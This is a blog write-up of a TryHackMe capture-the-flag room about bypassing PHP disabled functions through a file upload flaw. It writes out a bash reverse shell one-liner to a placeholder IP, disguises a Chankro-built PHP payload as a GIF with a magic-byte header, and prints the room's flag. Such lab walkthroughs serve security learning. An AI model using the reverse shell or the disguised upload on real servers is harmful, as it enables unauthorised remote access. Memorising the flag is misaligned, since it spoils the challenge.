Vuk Markovic - BlogTryHackMe - Bypass Disable Functions

Title Image

Bypass Disable Functions by Vuk Markovic

This CTF is based on file upload vulnerability and we are going to create and upload a file containing a malicious PHP script disguised as a GIF.

We have several more vulnerabilities that fall under the same branch:

  • Lack of file-type validation --> occurs when a system fails to properly verify the type of a file uploaded by a user, potentially allowing the execution of malicious files
  • No file size limit --> occurs when a system allows the upload of files without enforcing a maximum file size, potentially leading to denial of service or system resource exhaustion
  • Insufficient validation --> refers to a system's failure to adequately check input or data, leading to potential unauthorized actions or access

So, when we upload a file to the web server it should process it and allow us to do remote code execution.

Chankro:

Let's first start with downloading a tool named Chankro which will play it's role in this CTF:

Link --> https://github.com/TarlogicSecurity/Chankro

Installation:

  • git clone https://github.com/TarlogicSecurity/Chankro.git
  • cd Chankro
  • chmod +x chankro.py
  • python2 chankro.py --help

GoBuster:

Before we do anything with chankro, let's run gobuster so it can search through web directories and see what we get:

gobuster dir -u http://IP -w /usr/share/wordlists/dirb/common.txt

Once gobuster finishes we can see that we can use the following:

  • /assets/js/ --> Hint: see form validator
  • /phpinfo.php --> Hint: find document_root

Chankro Reverse Shell:

In chankro, we are going to create a reverse shell, and here's how:

  • Open mousepad and type in the command:
  • /bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/1234 0>&1'
  • Save the file with .sh

Next we are going to create our .php file which will be located in your chankro directory:

  • python2 chankro.py --arch 64 --input NAME_OF_.SH_FILE --output NAME_THAT_YOU_GIVE.php5 --path (add document_root path that you saw when we got results from our gobuster)
  • And our new php5 file is created
  • Now in order to upload it as a GIF, we need to edit it, so let's open it with mousepad:
  • At the very top of the script, add the following line:
  • GIF89a;
  • Save the file and exit

Final Preparations:

Let's enter our chankro direcotry and start netcat listener:

  • nc -lvnp 1234
  • Start netcat

Now, let's go to our webpage and upload our php5 file.

Once we uploaded the file we can navigate to:

  • IP/uploads

There you will see your file uploaded and just click on it to execute the script and you should be in.

After successful session, we will navigate to /home directory on target machine and then navigate to s4vi, list the items and there you will see flag.txt:

  • cat flag.txt
  • thm{bypass_d1sable_functions_1n_php}

And we got our flag ;D